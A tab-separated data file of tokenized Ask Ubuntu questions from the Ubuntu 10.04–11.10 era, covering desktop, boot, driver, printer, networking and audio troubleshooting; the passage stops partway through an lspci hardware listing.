105853	how can i change the icon in thunderbird 's `` new mail '' popup ?	when i recieve new mails in thunderbird a popup-message tells me about that . does anyone know where this icon is stored and how it is named ? i want to change it that it fits the faenza-theme . i use thunderbird 10.0.2 with following addons ( all preinstalled ) : eds contact integration 0.3.9 global menu bar integration 2.0.2 messaging menu and unity launcher integration 0.8.3 update : the addons do n't have any influence on the icon - i checked this by disabling them . i downloaded the source code and scanned it for the icon . i found it as comm-release/mail/themes/gnomestripe/mail/icons/new-mail-alert.png : since i could n't find this file ( i searched for the name ) on my pc i guess it is somehow built into thunderbird and protected against changes . or should there be an easy solution ( not to built your own deb-file ) ? ( in the same manner i 'd like to change downloadicon.png in firefox : )
105856	php5 libxml2 no version information available error	i keep getting half hourly email messages from the root cron relating to php startup error messages : subject : cron < root @ hostname > [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) -print0 | xargs -n 200 -r -0 rm message content ( snipped ) php5 : /usr/local/lib/libxml2.so.2 : no version information available ( required by php5 ) running php -v from a prompt reveals the same : php -v php : /usr/local/lib/libxml2.so.2 : no version information available ( required by php ) php : /usr/local/lib/libxml2.so.2 : no version information available ( required by php ) < snip > php 5.3.3-1ubuntu9.9 with suhosin-patch ( cli ) ( built : feb 9 2012 06:37:37 ) copyright ( c ) 1997-2009 the php group zend engine v2.3.0 , copyright ( c ) 1998-2010 zend technologies i did an `` apt-get upgrade php5-cli '' , hence the recent build date . phpinfo ( ) shows that it is using 2.7.7 of libxml2 doing a locate on libxml2.so reveals : /usr/lib/libxml2.so.2 /usr/lib/libxml2.so.2.7.7 /usr/local/lib/libxml2.so /usr/local/lib/libxml2.so.2 /usr/local/lib/libxml2.so.2.7.3 /var/src/libxml2-2.7.3/.libs/libxml2.so /var/src/libxml2-2.7.3/.libs/libxml2.so.2 /var/src/libxml2-2.7.3/.libs/libxml2.so.2.7.3 server info : distrib_id=ubuntu distrib_release=10.10 distrib_codename=maverick distrib_description= '' ubuntu 10.10 '' fyi , 64bit install on rs cloud . linux cfpbbh1 2.6.35.4-rscloud # 8 smp mon sep 20 15:54:33 utc 2010 x86_64 gnu/linux this has me baffled , and google is n't helping too much , nothing ubuntu specific at least , lots of cpanel/directadmin options but these arent installed ... there is one other question on this forum with the same problem , with the solution being to have symlinks pointing from the old to the new version ... but it seems there already is : /usr/lib # ll | grep libxml lrwxrwxrwx 1 root root 16 feb 14 11:54 libxml2.so - > libxml2.so.2.7.7 lrwxrwxrwx 1 root root 16 feb 14 12:25 libxml2.so.2 - > libxml2.so.2.7.7 -rw-r -- r -- 1 root root 1364056 jan 18 22:28 libxml2.so.2.7.7 anyone care to help ? assistance much appreciated ... if someone could tag this with libxml2 it may help others .
105857	ubuntu not booting : `` could not write bytes : broken pipes ''	the problem when i boot ubuntu 11.10 , the boot process hangs , before even getting to the login screen of the display manager , with the message could not write bytes : broken pipes at the top of the screen , followed by some lines of text ( where one yellow star left of `` pulseaudio '' is - do n't know if this is important ... ) , the last being * stopping system v runlevel compatability [ ok ] after that i can only press ctrl+alt+del to reboot . the cause the problem occured after i did an update on feb. , the 18th . in the process of the update a window popped up in which i had to choose the default display manager . being in a hurry , i just clicked `` ok '' ( gdm was the default selection in that window ) . afterwards i found out that ubuntu 11.10 us es lightdm so i figured , that maybe this was the cause of my problem . before this update everything worked fine . { what i tried so far to do to fix it [ skip this , if its too long ] i logged in as root in recovery mode and tried to reinstall lightdm . using the apt-get command i get error that spans over 3 lines of text , the first of which is not using locking for read only lock file /var/lib/dpkg/lock ; but i do n't know of any process that is using apt-get , that is preventing it from being run . after that i used dpkg-reconfigure lightdm and selected lightdm as the default display manager . this exited with the line mv : can not move 'etc/x11/default-display-manager ' to '/etc/x11/default-display-manager.pdkg-tmp ' : read-only file system '' . when i then booted in normal mode it still hung , but the message could not write bytes : broken pipes was gone , there were just two lines of text , the first said something about the battery state and the last was identical to the one above ( `` * stopping system v [ ... ] '' ) . i played around a little bit by also trying dpkg-reconfigure gdm and choosing gdm instead of lightdm , but none of that helped . the system still hangs , just with different lines of text showing up , but `` * stopping system v [ ... ] '' is always the last one. } other info this may be or not be relevant : i use multiple operating systems ( the other ones work ) and the kernel i use is 3.0.0-15-generic-pae . please help , i invested so much time in setting my ubuntu system up , i do n't want to do it all over again .
105863	is it possible set gnome 3 fallback panel font	is it possible to use a font for the gnome panel which is n't the default font . i tried to define the font inside a gnome theme but that does n't chnge anything and if i write something like : gtk-font-name = panel-menu=fontname in ~/.config/gtk-3.0/settings.ini nothing change .
105873	konica minolta bizhub c220 driver problem avoids us to switch to ubuntu	i am the guy who takes care of it stuff in the company and i want to switch company to ubuntu . however i could not make konica minolta bizhub c220 work with ubuntu 32 bit 11.10 . it finds the printer in the network . i install with the local ubuntu c360 driver ( which should help ) but when i send page to printer , it says it can not connect . i tried the linux driver from konica website , however i think it is already installed in the system . does anyone have any idea ?
105874	how can i disable the hud 's use of the alt key ?	i 'm interested in how to disable the new hud . any ideas ?
105875	creating a custom installation cd with lamp stack and some other packages preinstalled	we produce an office automation tool ( php+mysql ) and we install it on the customer 's server machine ( ubuntu 11.04 ) . now is there a way to produce an ubuntu installation cd that automatically installs the base os + packages ?
105878	system unable to boot	so i was in the process of restarting the system last night and it seemed to lock up at the ubuntu logo that normally appears when restarting or shutting down . so after waiting an hour or so to restart , i decided to hit the power button to shut down the system . after doing so and pressing the power button once again to start the system , i selected the ubuntu partition ( dual boot machine ) and it now does n't boot at all . i can boot the other os , which is windows 7 ok . there are a list of i guess internal commands listed on the screen and the last command was `` stopping mount network filesystems [ ok ] . i 've tried hitting ctrl + alt + del and the system will restart but will get locked up again on boot . is there anything i can ? i 've had this happen before and being a newbie i just reinstalled the system but after this happened again , i really do n't want to reinstall . suggestions are always welcomed ! thanks !
105889	can i completely disable the menu proxy ?	in recent ubuntus the menu has been pulled up into unity 's panel . that 's great , but it 's not for me . i 'm using the gnome 3 fallback panels for my desktop and like my menu 's like they always were . just using the fallback/classic mode does most of what i need . applications have their menus attached but only after a short delay . it 's as if they start without the menu and then the menu is added back after it realises there 's no unity to handle it . normally this would n't be catastrophic for anything but it 's really annoying for image viewer and other things that spring up their window based on the size of some media , only to have a menu jump in and ruin everything . here 's an example i risked my life to record and show you today : how annoying is that ? ! it goes from 100 % ( lovely ) to a cruddy 94 % ! so , yes ... how can i make it so when windows load , they do it like they used to , without the menu popping up seconds later , after it 's finished its cup of tea ? i thought running with the ubuntu_menuproxy explicitly set might help : ubuntu_menuproxy=0 eog 20120215-psychonauts.png but it does n't . same delay .
105890	'error : no such file or directory ' while installing ubuntu with wubi	i have tried installing ubuntu 11.10 ( wubi.exe ) twice now on windows xp sp3 . both times the whole process gets to `` remaining time approximately 0s '' , then an error occurred : no such file or directory . for more information , please see the log file : c : \docume~1\alex\locals~1\temp\wubi-11.10-rev245.log the file in question appears to be : p : \wubildr p is a pogoplug device - not connected at the time of install what can i do ?
105891	how to make lbp-1120 canon printer work ?	initially this question was limited to 11.10 . now i am in ( lubuntu ) 12.10 . ( on the changes in the question see this meta question ) . considering 11.10 i have tried different ( or not so different ) approaches - that also other users commented here . my main references were : the ubuntu official documentation website on the lbp canon driver package , this unixmen solution which partly refers to radu cotescu script that aims at providing a near-automated install , and an updated by unixmen version of that very script ( download here ) . none worked for me .
105893	several start-up scripts ?	i want kubuntu to ask me at start up - which of the profile i want to use . there should be a default answer which should run automatically in 3 seconds . much as if were grub asking you which operational system you would like to start . the rational to have several start-up options : normally i have a lot of things starting by default : krusader , firefox , konsole , emacs ... so the full loading takes about 1 minute . but sometimes - i 'm on the run , and need just to do some single thing - so i 'll need only , say krusader . i'd 've made several start-up scripts ... so i 'm wondering - is it possible to choose between them at start up ? perhaps that could be done with grub ... edit : grub did n't asked me about the start up profile at all - that is not even `` normal mode '' or `` recovery mode '' . i made him do it with grub editor ( the package is called kcm-grub2 ) : sudo sed -i ' $ a\deb http : //download.opensuse.org/repositories/home : ksmanis/xubuntu_11.10/ / ' /etc/apt/sources.list wget -q http : //download.opensuse.org/repositories/home : ksmanis/xubuntu_11.10/release.key -o- | sudo apt-key add - sudo apt-get update sudo apt-get install kcm-grub2 after the installation and restart , in system settings - > startup and shutdown new item has appeared : grub2 bootloader . in there - i checked `` automatically choose the default boot entry in 3 seconds '' . after that , following the lumbric solution i 've copied the gnu-linux menuentry record to the end of the /etc/grub.d/40_custom , and add a `` productivity-profile '' there . here 's the text of the modified 40_custom : # ! /bin/sh exec tail -n +3 $ 0 # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . menuentry 'full ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 392f79ba-0f1f-422f-ac76-11860e0f4869 linux /boot/vmlinuz-3.0.0-16-generic root=uuid=392f79ba-0f1f-422f-ac76-11860e0f4869 ro quiet splash vt.handoff=7 productivity-profile=1 initrd /boot/initrd.img-3.0.0-16-generic } menuentry 'public ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 392f79ba-0f1f-422f-ac76-11860e0f4869 linux /boot/vmlinuz-3.0.0-16-generic root=uuid=392f79ba-0f1f-422f-ac76-11860e0f4869 ro quiet splash vt.handoff=7 productivity-profile=2 initrd /boot/initrd.img-3.0.0-16-generic } menuentry 'fastest ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 392f79ba-0f1f-422f-ac76-11860e0f4869 linux /boot/vmlinuz-3.0.0-16-generic root=uuid=392f79ba-0f1f-422f-ac76-11860e0f4869 ro quiet splash vt.handoff=7 productivity-profile=3 initrd /boot/initrd.img-3.0.0-16-generic } productivity-profile is picked up by the start-up bash script . that 's it . now i have 5 start-up profiles : clean , recovery , full , public , fastest .
105894	will new ubuntu install be able to read/write to software raid 5 array created by a previous install ?	i would like to install ubuntu server on a usb drive and then boot from that usb drive . i want to create a software raid 5 array out of the 3 x 2tb hard drives in my computer which i will use for my data . i will use xfs on that raid array . i will dd my usb key so i can create a clone it the original dies . however , what happens if i want to create a whole new install of ubuntu server instead , perhaps located on a 4th hard drive instead of on a usb key . will this new install of ubuntu be able to use the software raid 5 array and xfs file system that was created by my initial install ? as a secondary and not as important question , if i decided to make my os openmediavault instead , which is based on debian , will i still be able to use the data on my 3 x 2tb drives ?
105897	how do i file a bug for a trackpad ?	i believe i 've found a regression in click-and-drag on my laptop 's trackpad , and it 's proving to be very annoying . i 'd like to file a bug , but i have no idea what package i should file against . i 've already taken a look at how do i report a bug ? , but did n't find what i was looking for there . the top-rated answer suggests https : //wiki.ubuntu.com/bugs/findrightpackage to determine what package i need to file against , but there 's no mention of trackpads there , either .
105900	can i save a window size to a specific size on default ? not full screen	how i get firefox to remember size and position of the window .
105902	networkmanager does n't detect my broadband device	i have a huawei k3765 ( usb id 12d1:1520 ) and i 'm trying to use it with ubuntu 10.04 lucid . i have usb-modeswitch installed , so when i plug the device i can see that it gets switched from storage-mode to modem-mode . my problem is that when i try to create a broadband mobile connection for it , networkmanager does n't detect the modem ... i tried this on two different laptops . /var/log/daemon.log does n't show anything of interest , afaikt ... what could i try ?
105903	i would like to change the size of my partitions ( increase windows 7 by approx 50gb )	so i have installed 11.10 alongside windows7 , and i did n't realise that i needed more than i allocated for windows 7 to back up my ipod . is there a simple way to do this ? i tried to reinstall , but it did n't allow me to change partition sizes . can i erase all and start again or will that actually completely erase my windows installation ? cheers
105911	how to make pidgin the default `` chat '' client in messaging menu	if i remove empathy and install pidgin ( which handles notifications a bit better than empathy ) , then how to i replace empathy completely in the messaging menu ? right now , `` chat '' disappears and `` pidgin instant messenger '' appears in the menu . i 'd also like pidgin to be called `` chat '' . is this possible ?
105914	mouse pointer/cursor is missing	i am looking for help with my mouse every time i turn on my laptop and log into ubuntu 11.10 mouse mouse is not on the screen except when i move my mouse over to the left on the icons there it is i log out and log back in the mouse is on the screen my laptop is a compaq presario v2000
105924	ubuntu one problem with instalation	i 've tried to install ubuntu one again and i run into probem . i 's trying to do it with ubuntu software center - instaled ubuntu one but i can not find ubuntu one in menu so a marked to install ubuntuone-control-panel-gtk and i saw this - `` ubuntuone-control-panel-gtk : wymaga : ubuntuone-installer but it is not installable '' i downloaded ubuntuone installer but i can not install it - e : package 'ubuntuone-installer ' has no installation candidate
105931	how do you remove the network icon from gnome shell ?	using gnome shell , how do i get rid of the network icon from the top right in the panel ?
105933	how to align virtual desktops to 2x2 in cairo-dock switcher ?	under compiz : : general options : : desktop size i already have 2x2 layout of 4 virtual desktops setup , as in screenshot . however if you notice as in the switcher app parked in the top left corner , only one desktop shows , and indeed only one is available to send windows to or hover over to . right-clicking that docked switcher to `` add a workspace '' does n't behave right anymore . it 's like the desktops are too independent and trying to send windows to right/down is n't an option anymore from the alt space menu . nor do hotkeys ctrl-alt-arrow work to slide over anymore . double-clicking does switch desktops though , but it 's like they 're in otherwise unrelated xwindows sessions ( can not be , of course ) . for a while i 've been stuck with a stubborn 1x1 or 1xn layout , unable to figure out why it wo n't go to 2 columns , until i discovered the compiz : : general options : : desktop size : : `` number of desktops '' had mysteriously gone to 0 . horizontal and vertical were both still 2 there . ( weird things happened when i next made that 0 into 4 -- switcher at first drew 16 virtual desktop boxes , after which i decided to collapse everybody into 1 desktop and start again from there . ) my ~/.dmrc contains only : [ desktop ] session=cairo-dock i noticed each has a title now : work / game / video / chat , maybe they were present before i had to reboot from a total xwindows unresponsive freeze ( though switching back and forth from text consoles ctrl alt f1-f6 still worked ) twice , but i do n't recall titles before . after some updates to cairo-dock and many other packages since feb , notice 16 workspace boxes manifested themselves again , though only 4 seem switchable via ctrl-arrow keys :
105941	swap partition is being corrupted by running ubuntu from a usb stick	the question i have is a little complicated , i 'll try to walk you through the problem : basically , i installed ubuntu 11.10 onto a usb thumb drive that i formatted as an ext2 partition . i did n't want to go the live usb route because i wanted full control over all the files on the partition . because i installed it on a usb stick i chose not to create a swap partition ( to decrease disk i/o and because i would n't want to hibernate my usb stick anyway ) . aside from that , i own an asus eee pc netbook that is running oneiric as well , but obviously with a separate swap partition . now , my problem is as follows : whenever i decide to boot up ubuntu from my usb stick ( whose partition table does n't include a swap partition or any partition outside of the usb stick ) , that seems to corrupt the swap partition on my netbook . i 'm not sure as to why or how that happens , but basically when i boot back into my regular ubuntu on my netbook , it tells me that the headers of the swap partition are wrong/corrupt ( i do n't remember the exact wording ) . in order to get my swap partition working again , i then have to : sudo mkswap /dev/sda8 [ my swap partition ] & & sudo swapon -a this workaround is fine , but it 's a real hassle . also , it gets me thinking what might happen to other people 's systems if i put my usb stick in their computer . i have n't tried that yet , but it seems a real possibility that it might screw with their setup as well . anyhow , i really have no idea what 's going on because the fstab on my usb thumb drive does n't mention a swap partition , but i 'm guessing something must be going wrong when ubuntu does a disk scan to check for mountable partitions . any thoughts ?
105947	how can i change the boot order ( grub2 ) ?	i saw guides of setting first operation system to boot . how can i set also the second operation system to boot ?
105948	how secure is gnome-online-accounts ?	as with anything that wants my passwords i want to know about the how safe it is to use the gnome-online-accounts [ g-o-a ] feature ( and how it can be exploited ) . i 'm only interested in the google part of it since that is all that is available at the moment . i want to understand if it stores my password in any way - i get the impression it uses some kind of token authentication but i do n't understand this . is it possible to steal a password ( or similar ? ) from my computer through g-o-a ? all the documentation that i have found is far too complex for a normal person to understand .
105951	low disk space `` filesystem root ''	running 11.04 low disk space warning . results of df : filesystem 1k-blocks used available use % mounted on /dev/sda2 31381148 10417896 19390492 35 % / none 1022392 728 1021664 1 % /dev none 1030768 8 1030760 1 % /dev/shm none 1030768 324 1030444 1 % /var/run none 1030768 0 1030768 0 % /var/lock /dev/sda4 245055476 35884908 196903460 16 % /home /dev/sda1 31383196 595552 29214780 2 % /media/731f2d14-635c-4ef6-a0a9-88ce11464ad9 /dev/sda5 175222776 2722340 163728140 2 % /media/extended /dev/sdc1 976760032 53394052 923365980 6 % /media/freeagent goflex drive_ what application can be used to free up space or move files or increase the /root filesystem , safely . result of df -h : filesystem size used avail use % mounted on /dev/sda2 30g 10g 19g 35 % / none 999m 728k 998m 1 % /dev none 1007m 8.0k 1007m 1 % /dev/shm none 1007m 324k 1007m 1 % /var/run none 1007m 0 1007m 0 % /var/lock /dev/sda4 234g 35g 188g 16 % /home /dev/sda1 30g 582m 28g 2 % /media/731f2d14-635c-4ef6-a0a9-88ce11464ad9 /dev/sda5 168g 2.6g 157g 2 % /media/extended /dev/sdc1 932g 51g 881g 6 % /media/freeagent goflex drive_ result of df -i : filesystem inodes iused ifree iuse % mounted on /dev/sda2 1966080 315531 1650549 17 % / none 215307 1049 214258 1 % /dev none 219494 3 219491 1 % /dev/shm none 219494 68 219426 1 % /var/run none 219494 4 219490 1 % /var/lock /dev/sda4 15335424 23088 15312336 1 % /home /dev/sda1 1966080 11 1966069 1 % /media/731f2d14-635c-4ef6-a0a9-88ce11464ad9 /dev/sda5 10969088 11 10969077 1 % /media/extended /dev/sdc1 924971612 1576830 923394782 1 % /media/freeagent goflex drive_ this is growing > > > >
105952	can not start xampp	when i try to start xampp with /opt/lampp/lampp start command it gives me a message like this . starting xampp for linux 1.7.7 ... xampp : another web server daemon is already running . xampp : xampp-mysql is already running . xampp : xampp-proftpd is already running . xampp for linux started .
105953	severe bug in chrome linux ? ca n't authorize on blogs in order to post comments	for some reason , on blog sites such as tuaw.com and omgubuntu.co.uk ( just to name two ) , i ca n't log in to comment . http : //www.omgubuntu.co.uk i can surf to any article , and when i try to log in via disqus , it just closes the login window and nothing happens . very odd this happens on tuaw.com as well . yet firefox functions perfectly . i 'm on ubuntu 11.10 . can anyone replicate this ? edit : fails in private mode too , even with all extensions disabled . chrome ( note this is chrome installed from the google site , not chromium ) version is 17.0.963.56 ( build 121963 ) . update : it appears to be something wrong in my preferences . i started a fresh chrome install from scratch , without syncing my prefs , and the sites worked fine . then i sync 'd prefs , and they wo n't authorize me to comment .
105955	end the gui on tty7 , and start a new one elsewhere	how can i end the gui from a different tty , then start up a new one . this is for the occasional freeze of the gui , or inaccessibility . when all i can do is switch to another tty ( using ctrl+alt+f5 for tty5 ) and start over , or reboot .
105957	how may i upload my source package with active ftp over dput to launchpad	my question is how can i upload my source package ( i already got the .sources file ) over the active ftp method with dput to my launchpad ppa ? my .dput.cf file looks as follows : [ cooking ] fqdn = ppa.launchpad.net method = ftp incoming = ~gotwig/lens-cooking/ubuntu/ login = anonymous passive_ftp = 0 my command is dput cooking lens-cooking_0.1_source.changes the traceback is : good signature on /home/gotwig/lens-cooking_0.1.dsc . uploading to cooking ( via ftp to ppa.launchpad.net ) : uploading lens-cooking_0.1.dsc : 425 ca n't open data connection . it seems to me , as it want to use passive_ftp instead of active one.. i cant use passive ftp becouse of my router . if there is a way without a configuration file , i would be even more happy .
105958	dual boot missing files on ntfs	i have 3 partitions : one for win7 ( ntfs ) , one for ubuntu ( ext4 ) and one just for data ( ntfs so both operating systems can see them ) . my problem is that i had stored some files on the data partition using ubuntu and when i booted win7 all that data was gone ! after that i could n't find the files even when using ubuntu . my files were simply gone : ( is there something i can do in ubuntu or is it just windows problem ?
105961	i need a simple proxy app to modify user agent header .	i use a gsm internet plan for accessing internet from my laptop . they allow only one application to use internet at a time . i think they track the application with their user agent . so installing a proxy on my laptop and modifies all user agent to a single one may solve my problem . so please suggest me a good proxy software for the problem . i tried cntlm , but it didnt modify the user agent , eventhough it has an option for that .
105970	file not found grub rescue prompt	so , while programming today i got the terminal error saying that ls was not available and to type in some sudo command to get it . i typed in said sudo command and it told me that it did n't work . i am new to linux and so i ca n't give more information than that . now , when i attempt to boot linux i get `` file not found . grub rescue > '' prompt . i have no idea what that means or what to do . i have tried putting commands into the grub prompt that fedora likes but to no avail . i am using ubuntu on a virtual disk with virtualbox .
105973	how to update to vlc 2.0 in 10.04 ?	is there any ppa for to update vlc to 2.0 version in ubuntu 10.04 ? if not how can i update it . i have already tried this ppa sudo add-apt-repository ppa : n-muench/vlc2 sudo apt-get update & & sudo apt-get install vlc and it never works . it just gives the 1.1.13 version .
105977	eclipse tooltip preference bar on focus	when i hover over a suggestion line in eclipse to view the suggestion tooltip box , and then focus on the tooltip box , a bar gets added to the bottom of the tooltip obscuring some of the text . it 's easily fixable by resizing the tooltip box , but it 's annoying and ruins my workflow . any suggestions to get around this ? sorry if i have n't put this very eloquently , it 's hard to explain . below is a couple of screenshots to give you an idea of what i mean . before i 've moved my mouse into the tooltip after i 've moved my mouse into the tooltip ( i ca n't post images because i 'm too new . ) i 'm on ubuntu 11.10 using eclipse 3.7 .
105980	error during login	i 'm using ubuntu 11.10 and i 'm new to linux family . i have a problem with logging in to it . after i enter password and press enter it says : could not connect to session bus : //bin/dbus-launch terminated abnormally without any error message according to this question `` could not connect to session bus '' on login i tried to login as guest user and succeeded . so it 's `` definitely a problem with my home folder '' . and o think i know what the problem is . the question is : how can i get access to my home folder ?
105985	gnome shell with multi-device and multiple monitors	i have two radeon 4850 hd with a crossfire link , with two monitors attached to each card . how do i configure xrandr to treat this as one big desktop ? i 've had all 4 monitors working with ximerama , but gnome-shell does n't work under that . if this is not currently possible , could i get a link to the relevant but reports ? thanks .
105993	i can not install any packages from terminal or software centre . please help !	whenever i try to install software from software centre , it says package dependencies can not be resolved . i have tried restarting , sudo apt-get update/upgrade/clean . i am very new to ubuntu , and i need to install java . i also tried restarting my computer . should i just reinstall ubuntu ?
106004	accidentally clicked `` do n't show this message again '' - how to reactivate ?	when gnome 3.2 told me , there are wireless networks available , i accidentally clicked `` do n't show this message again '' . how can i reactivate this message ?
106006	how can i acess all windows 7 files from a wubi ubuntu installation ?	i do n't want to install any programs or anything . i just want to know if its possible . if so , how ? i am dual booting , using wubi for the record .
106009	compiz window previews stay for too long after my mouse has long moved away . ( gnome classic and xubuntu ) fix ?	whenever i use window previews compiz plugin , the previews stay even once i have moved my mouse elsewhere , this happens in gnome classic and xfce too . any ideas how to solve this ?
106014	no wireless connection on a broadcom bcm43227	i´ve installed ubuntu 11.10 on my acer aspire laptop and can´t get any wireless connection . where is my problem ? my wireless card is an acer nplify ( tm ) 802.11b/g/n . thanks in advance @ mikewhatever : nic @ ubuntu : ~ $ lspci -nnk | grep -ia2 net kernel driver in use : tg3 -- 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm57785 gigabit ethernet pcie [ 14e4:16b5 ] ( rev 10 ) subsystem : acer incorporated [ ali ] device [ 1025:0504 ] kernel driver in use : sdhci-pci 02:00.1 sd host controller [ 0805 ] : broadcom corporation netxtreme bcm57765 memory card reader [ 14e4:16bc ] ( rev 10 ) subsystem : acer incorporated [ ali ] device [ 1025:0504 ] 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43227 802.11b/g/n [ 14e4:4358 ] subsystem : foxconn international , inc. device [ 105b : e040 ]
106015	weird menu overlapping with top panel in gnome 3	this just started the other day , months after my install . there is the menu list of a program ( looks like it 's the nautilus menu ) underneath of my semi-transparent top panel in gnome 3 . it goes away when i enter tableau mode , and also when i turn off the custom theme extension . here is a picture : any ideas of what this is and how to get rid of it ? i 'm running 11.10 64-bit .
106016	sound comes from just the bass speakers instead of all 4 built in speakers	so i feel like i 've tried everything from changing settings in alsamixer and pulse audio volume controller , to editing alsa.conf files , to purging and reinstalling alsa and pulseaudio , to outright formatting and reinstalling . this happens when i installed ubuntu 11.04 , 11.10 , as well as mint 11 and 12 . this is my lspci -v : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : c0000000-d30fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 47 memory at d3400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at e0e0 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 16 memory at d7409000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , medium devsel , latency 0 , irq 16 memory at d7407000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 49 memory at d7400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff memory behind bridge : d6000000-d73fffff prefetchable memory behind bridge : 00000000d7700000-00000000d78fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000b000-0000bfff memory behind bridge : d4c00000-d5ffffff prefetchable memory behind bridge : 00000000d7500000-00000000d76fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000a000-0000afff memory behind bridge : d3800000-d4bfffff prefetchable memory behind bridge : 00000000d3100000-00000000d32fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , medium devsel , latency 0 , irq 23 memory at d7406000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=128 capabilities : < access denied > 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : itco_wdt 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 05 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at e0d0 [ size=8 ] i/o ports at e0c0 [ size=4 ] i/o ports at e0b0 [ size=8 ] i/o ports at e0a0 [ size=4 ] i/o ports at e090 [ size=16 ] i/o ports at e080 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) subsystem : micro-star international co. , ltd. device 1075 flags : medium devsel , irq 11 memory at d7405000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at e000 [ size=32 ] kernel modules : i2c-i801 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 05 ) ( prog-if 85 [ master seco prio ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at e070 [ size=8 ] i/o ports at e060 [ size=4 ] i/o ports at e050 [ size=8 ] i/o ports at e040 [ size=4 ] i/o ports at e030 [ size=16 ] i/o ports at e020 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , irq 18 memory at d7404000 ( 64-bit , non-prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : intel ips kernel modules : intel_ips 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 425m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : micro-star international co. , ltd. device 1075 flags : bus master , fast devsel , latency 0 , 